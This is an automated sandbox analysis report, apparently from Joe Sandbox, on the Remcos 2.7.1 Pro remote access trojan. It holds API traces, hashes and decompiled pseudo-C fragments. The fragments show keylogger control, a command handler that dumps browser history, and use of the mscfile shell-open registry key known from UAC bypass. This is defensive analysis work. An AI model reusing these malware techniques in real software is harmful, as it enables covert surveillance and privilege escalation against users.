                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.1 Pro
                                  • API String ID: 3419900118-867065911
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: 7a30c22b88a0c25bd1851bcafb30656a9677321df84462301581be4465969a35
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: F1212B36B406085BCB19DB7DDCE45EE7A97A7C4251B95827EF80BD73C0DEB08D488604
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                  • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                  • API String ID: 1883807236-2313358711
                                  • Opcode ID: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                  • Opcode Fuzzy Hash: 6164d948096cc69d9a41c6752b69c33c22d8fca847b1021a8e2a0f545ec2985b
                                  • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 3885969548-3088914985
                                  • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                  • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                  • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00405CCA(struct HHOOK__** __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t9;
                                  				struct HHOOK__* _t16;
                                  				struct HHOOK__** _t30;
                                  
                                  				_push(__ecx);
                                  				_t30 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					_t9 = 0;
                                  				} else {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                  					E00405DD3(__ecx);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                  					_t30[0xf] = 0;
                                  					_t6 =  &(_t30[0xd]); // 0x0
                                  					_t30[0xa] = 0;
                                  					CloseHandle( *_t6);
                                  					if(_t30[0xf] == 0) {
                                  						_t16 =  *_t30;
                                  						if(_t16 != 0) {
                                  							UnhookWindowsHookEx(_t16);
                                  							 *_t30 = 0;
                                  						}
                                  					}
                                  					_t9 = 1;
                                  				}
                                  				return _t9;
                                  			}
                                  0x00405ccd
                                  0x00405cd0
                                  0x00405cd8
                                  0x00405d49
                                  0x00405cda
                                  0x00405ce9
                                  0x00405cf1
                                  0x00405d00
                                  0x00405d14
                                  0x00405d1a
                                  0x00405d22
                                  0x00405d25
                                  0x00405d28
                                  0x00405d2b
                                  0x00405d34
                                  0x00405d36
                                  0x00405d3a
                                  0x00405d3d
                                  0x00405d43
                                  0x00405d43
                                  0x00405d3a
                                  0x00405d45
                                  0x00405d45
                                  0x00405d4f

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                  • String ID: Online Keylogger Stopped$[INFO]
                                  • API String ID: 2254939683-2146459034
                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                  				char _v20;
                                  				char _v36;
                                  				void* _t18;
                                  				void* _t20;
                                  				intOrPtr _t39;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t39 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t18 = _t39 - 0x9b;
                                  				if(_t18 == 0) {
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                  					 *0x41b288 = 1;
                                  					_t20 = E0040180C( &_v20, __eflags, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E004020C2(0x41b240, 0x9c, _t20);
                                  				} else {
                                  					if(_t18 == 0) {
                                  						E00401B26();
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                   			}

                                   Addresses of the decompiled statement lines above, in order: 0x00401a68 0x00401a6e 0x00401a80 0x00401a90 0x00401a9f 0x00401aa9 0x00401ab3 0x00401ab8 0x00401ad5 0x00401ae0 0x00401ae7 0x00401af2 0x00401b02 0x00401aba 0x00401abc 0x00401abe 0x00401abe 0x00401abc 0x00401b0a 0x00401b12 0x00401b1b 0x00401b25

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
